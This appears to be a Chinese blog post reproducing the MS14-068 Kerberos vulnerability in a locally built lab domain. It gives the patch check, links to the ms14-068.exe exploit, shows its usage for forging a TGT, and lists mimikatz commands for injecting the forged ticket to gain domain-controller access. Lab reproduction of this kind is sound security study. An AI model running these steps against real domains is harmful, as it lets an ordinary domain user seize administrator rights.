MS14-068 复现

前言

1、Kerberos协议在过去几年被曝光了一些漏洞,一个影响最大的漏洞是MS14-068

2、漏洞效果:域用户利用该漏洞可以获取域管理员权限。

3、MS14-068 CVE编号:CVE-2014-6324;补丁号为KB3011780。

环境准备

域环境:本地搭建

域用户主机:Win7 sp1 32位

工具:mimikatz、ms14-068.exe

复现

1、域控漏洞自检。在域控上执行如下:

systeminfo | find "3011780"

结果为空,因为没有打该补丁。确认存在该漏洞。

2、获取域成员主机SID。在域成员主机执行如下:

3、生成TGT票据。使用ms14-068.exe,有Python脚本,下面链接包含Py转exe,实测小H伞会报(ms14-068.exe)

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

使用方法

ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

4、票据注入。使用mimikatz将票据注入到当前内存中,伪造凭证

mimikatz # kerberos::purge             //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list              //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件路径   //将票据注入到内存中

此时,已成功将票据注入到内存中,在CMD中klist命令查看

5、测试。尝试访问域控,成功!

6、在mimikatz中清空当前机器凭证,再次访问,失败。


https://blog.51cto.com/z2ppp/2060051

发布了55 篇原创文章 · 获赞 1 · 访问量 2732

猜你喜欢

转载自blog.csdn.net/prettyX/article/details/103700791